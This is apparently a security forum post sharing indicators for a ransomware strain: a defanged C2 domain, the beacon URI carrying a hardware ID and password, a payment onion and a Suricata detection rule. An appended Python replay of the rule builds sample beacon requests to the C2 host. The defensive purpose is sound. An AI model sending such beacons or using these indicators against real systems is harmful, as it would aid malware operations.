I searched and did not see this posted here yet, sorry if I missed it.

C2 domain: cybercrime[.]rocks
C2 URI struct: /cryptotolarance/add.php?hwid=[redacted]&winversion=[kernelversion]&pswd=[redacted]
Panel: hxxp://cybercrime[.]rocks/cryptotolarance/login.php
Payment onion returned from C2 on 3-18-15: iupfnqg2uaigwoei

I have not done any debugging/RE on this, but it seems to check geolocation (api.wipmania.com) and, if US is returned, does not carry out part of its functionality.

Suricata rule:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Exaction Cryptolocker CnC Beacon"; flow:established,to_server; content:".php?"; http_uri; content:"hwid="; http_uri; content:"winversion="; http_uri; fast_pattern:only; content:"pswd="; http_uri; content:!"Referer|3a|"; http_header; reference:md5,b5ea8f65bd7845aeaf0732b8aacacc86; classtype:trojan-activity; sid:1; rev:1;)

Download pass: infected
Source
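Added example, not part of the original post: the Suricata rule above is reproduced in plain Python so you can see exactly which requests it alerts on. It mirrors the rule's logic (four case-sensitive `content:` matches in the URI plus the negated `Referer:` header match) against constructed HTTP requests; the hwid, winversion and pswd values below are placeholders, not real samples, and the helper names are my own.

```python
"""Replay of the 'Exaction Cryptolocker CnC Beacon' Suricata rule in Python.

Added example: these are constructed requests and hypothetical helper names,
not data or code from the original post.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests. The beacon mirrors the posted URI structure;
# hwid/pswd values are placeholders only.
BEACON = (
    "GET /cryptotolarance/add.php?hwid=0123456789ABCDEF&winversion=6.1&pswd=placeholder HTTP/1.1\r\n"
    "Host: cybercrime.rocks\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
    "\r\n"
)

# Same URI but with a Referer header: the rule's content:!"Referer|3a|"
# clause means this would NOT alert (browser-driven traffic, not a beacon).
WITH_REFERER = (
    "GET /cryptotolarance/add.php?hwid=0123456789ABCDEF&winversion=6.1&pswd=placeholder HTTP/1.1\r\n"
    "Host: cybercrime.rocks\r\n"
    "Referer: http://cybercrime.rocks/cryptotolarance/login.php\r\n"
    "\r\n"
)

# Ordinary login form that shares one parameter name but not the others.
BENIGN = (
    "GET /login.php?user=bob&pswd=hunter2 HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "\r\n"
)

# The four http_uri content matches from the rule, in rule order.
REQUIRED_URI_TOKENS = (".php?", "hwid=", "winversion=", "pswd=")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, uri, raw header block)."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, _, header_block = head.partition("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    return method, uri, header_block


def matches_beacon(raw: str) -> bool:
    """True when the request would trip the rule.

    Suricata content matches are case-sensitive unless 'nocase' is given, so
    plain substring tests on the URI and header block reproduce them exactly.
    """
    _method, uri, header_block = parse_request(raw)
    if not all(token in uri for token in REQUIRED_URI_TOKENS):
        return False
    # content:!"Referer|3a|"; http_header  -> alert only if "Referer:" is absent
    if "Referer:" in header_block:
        return False
    return True


def extract_beacon_fields(raw: str) -> dict:
    """Pull the three C2 query parameters out of a request for triage."""
    _method, uri, _headers = parse_request(raw)
    query = parse_qs(urlsplit(uri).query)
    return {name: query.get(name, [None])[0] for name in ("hwid", "winversion", "pswd")}


if __name__ == "__main__":
    for label, req in (("beacon", BEACON), ("with_referer", WITH_REFERER), ("benign", BENIGN)):
        print(f"{label:13s} alert={matches_beacon(req)}")
    print(extract_beacon_fields(BEACON))
```

Note that the rule only keys on parameter names and the `.php?` fragment, not on the host or the `/cryptotolarance/` path, so any tool that sends `hwid=`, `winversion=` and `pswd=` in one query string without a Referer will also match; the host in the alert should be checked against the C2 domain before escalating.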